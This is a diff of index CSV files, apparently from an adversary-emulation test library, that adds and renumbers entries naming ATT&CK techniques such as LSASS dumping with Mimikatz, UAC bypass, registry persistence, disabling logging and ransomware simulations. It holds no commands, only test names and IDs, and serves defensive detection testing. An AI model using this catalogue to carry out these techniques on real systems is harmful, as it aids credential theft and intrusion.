+discovery,T1057,Process Discovery,4,Process Discovery - get-wmiObject,b51239b4-0129-474f-a2b4-70f855b9f2c2,powershell
+discovery,T1057,Process Discovery,5,Process Discovery - wmic process,640cbf6d-659b-498b-ba53-f6dd1a1cc02c,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
 discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
 discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
@@ -854,6 +905,10 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
@@ -970,6 +1025,7 @@ execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a6
 execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
 execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt
 execution,T1059.003,Windows Command Shell,3,Suspicious Execution via Windows Command Shell,d0eb3597-a1b3-4d65-b33b-2cda8d397f20,command_prompt
+execution,T1059.003,Windows Command Shell,4,Simulate BlackByte Ransomware Print Bombing,6b2903ac-8f36-450d-9ad5-b220e8a2dcb9,powershell
 execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
 execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
 execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -27,6 +27,7 @@ credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864b
 credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
 credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
 credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
+credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
 credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
 collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
 collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
@@ -96,6 +97,7 @@ defense-evasion,T1140,Deobfuscate/Decode Files or Information,4,Base64 decoding
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,5,Base64 decoding with shell utilities,b4f6a567-a27a-41e5-b8ef-ac4b4008bb7e,sh
 defense-evasion,T1140,Deobfuscate/Decode Files or Information,6,Hex decoding with shell utilities,005943f9-8dd5-4349-8b46-0313c0a9f973,sh
 defense-evasion,T1562.008,Disable Cloud Logs,1,AWS CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
+defense-evasion,T1562.008,Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
 defense-evasion,T1562.004,Disable or Modify System Firewall,7,Stop/Start UFW firewall,fe135572-edcd-49a2-afe6-1d39521c5a9a,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,8,Stop/Start UFW firewall systemctl,9fd99609-1854-4f3c-b47b-97d9a5972bd1,sh
 defense-evasion,T1562.004,Disable or Modify System Firewall,9,Turn off UFW logging,8a95b832-2c2a-494d-9cb0-dc9dd97c8bad,sh
@@ -206,6 +208,7 @@ persistence,T1098,Account Manipulation,4,Azure - adding user to Azure AD role,0e
 persistence,T1098,Account Manipulation,5,Azure - adding service principal to Azure AD role,92c40b3f-c406-4d1f-8d2b-c039bf5009e4,powershell
 persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
 persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
+persistence,T1098,Account Manipulation,8,AzureAD - adding permission to application,94ea9cc3-81f9-4111-8dde-3fb54f36af4b,powershell
 persistence,T1098.001,Additional Cloud Credentials,1,Azure AD Application Hijacking - Service Principal,b8e747c3-bdf7-4d71-bce2-f1df2a057406,powershell
 persistence,T1098.001,Additional Cloud Credentials,2,Azure AD Application Hijacking - App Registration,a12b5531-acab-4618-a470-0dafb294a87a,powershell
 persistence,T1098.001,Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -1,5 +1,6 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
+credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
@@ -32,19 +33,18 @@ credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,9
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
-credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt
-credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
-credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
-credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
-credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
-credential-access,T1003.001,LSASS Memory,6,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
-credential-access,T1003.001,LSASS Memory,7,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
-credential-access,T1003.001,LSASS Memory,8,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
-credential-access,T1003.001,LSASS Memory,9,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
-credential-access,T1003.001,LSASS Memory,10,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
-credential-access,T1003.001,LSASS Memory,11,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
-credential-access,T1003.001,LSASS Memory,12,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
-credential-access,T1003.001,LSASS Memory,13,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
+credential-access,T1003.001,LSASS Memory,1,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt
+credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell
+credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt
+credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using NanoDump,dddd4aca-bbed-46f0-984d-e4c5971c51ea,command_prompt
+credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual
+credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt
+credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt
+credential-access,T1003.001,LSASS Memory,8,Dump LSASS.exe Memory using Out-Minidump.ps1,6502c8f0-b775-4dbd-9193-1298f56b6781,powershell
+credential-access,T1003.001,LSASS Memory,9,Create Mini Dump of LSASS.exe using ProcDump,7cede33f-0acd-44ef-9774-15511300b24b,command_prompt
+credential-access,T1003.001,LSASS Memory,10,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell
+credential-access,T1003.001,LSASS Memory,11,Dump LSASS with .Net 5 createdump.exe,9d0072c8-7cca-45c4-bd14-f852cfa35cf0,powershell
+credential-access,T1003.001,LSASS Memory,12,Dump LSASS.exe using imported Microsoft DLLs,86fc3f40-237f-4701-b155-81c01c48d697,powershell
 credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt
 credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt
 credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt
@@ -107,6 +107,7 @@ privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/
 privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
 privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell
+privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell
 privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt
@@ -159,6 +160,8 @@ privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious v
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
+privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
 privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -270,6 +273,7 @@ defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5
 defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell
 defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt
 defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
+defense-evasion,T1564.001,Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
 defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
@@ -298,6 +302,7 @@ defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
 defense-evasion,T1036,Masquerading,2,Malware Masquerading and Execution from Zip File,4449c89b-ec82-43a4-89c1-91e2f1abeecc,powershell
+defense-evasion,T1036.005,Match Legitimate Name or Location,2,Masquerade as a built-in system executable,35eb8d16-9820-4423-a2a1-90c4f5edd9ca,powershell
 defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt
 defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt
 defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt
@@ -305,6 +310,31 @@ defense-evasion,T1112,Modify Registry,4,Add domain to Trusted sites Zone,cf44767
 defense-evasion,T1112,Modify Registry,5,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
 defense-evasion,T1112,Modify Registry,6,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
 defense-evasion,T1112,Modify Registry,7,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,9,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,10,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
+defense-evasion,T1112,Modify Registry,11,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,12,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
+defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
+defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
+defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
+defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
+defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
+defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
+defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
+defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
+defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
+defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
+defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
+defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
+defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
+defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
+defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
 defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
 defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
 defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
@@ -390,6 +420,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compile
 defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,8,Invoke-ATHRemoteFXvGPUDisablementCommand base test,9ebe7901-7edf-45c0-b5c7-8366300919db,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,9,DiskShadow Command Execution,0e1483ba-8f0c-425d-b8c6-42736e058eaa,powershell
+defense-evasion,T1218,Signed Binary Proxy Execution,10,Load Arbitrary DLL via Wuauclt (Windows Update Client),49fbd548-49e9-4bb7-94a6-3769613912b8,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt
 defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt
 defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
@@ -425,6 +456,7 @@ persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6
 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
 persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
 persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
+persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
 persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
@@ -464,6 +496,8 @@ persistence,T1547.001,Registry Run Keys / Startup Folder,4,Suspicious vbs file r
 persistence,T1547.001,Registry Run Keys / Startup Folder,5,Suspicious jse file run from startup Folder,dade9447-791e-4c8f-b04b-3a35855dfa06,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,6,Suspicious bat file run from startup Folder,5b6768e4-44d2-44f0-89da-a01d1430fd5e,powershell
 persistence,T1547.001,Registry Run Keys / Startup Folder,7,Add Executable Shortcut Link to User Startup Folder,24e55612-85f6-4bd6-ae74-a73d02e3441d,powershell
+persistence,T1547.001,Registry Run Keys / Startup Folder,8,Add persistance via Recycle bin,bda6a3d6-7aa7-4e89-908b-306772e9662f,command_prompt
+persistence,T1547.001,Registry Run Keys / Startup Folder,9,SystemBC Malware-as-a-Service Registry,9dc7767b-30c1-4cc4-b999-50cab5e27891,powershell
 persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt
@@ -501,6 +535,7 @@ impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via
 impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
 impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
 impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
+impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
 impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
 impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
@@ -522,6 +557,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -530,6 +567,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -539,6 +581,7 @@ discovery,T1482,Domain Trust Discovery,6,Get-DomainTrust with PowerView,f974894c
 discovery,T1482,Domain Trust Discovery,7,Get-ForestTrust with PowerView,58ed10e8-0738-4651-8408-3a3e9a526279,powershell
 discovery,T1083,File and Directory Discovery,1,File and Directory Discovery (cmd.exe),0e36303b-6762-4500-b003-127743b80ba6,command_prompt
 discovery,T1083,File and Directory Discovery,2,File and Directory Discovery (PowerShell),2158908e-b7ef-4c21-8a83-3ce4dd05a924,powershell
+discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
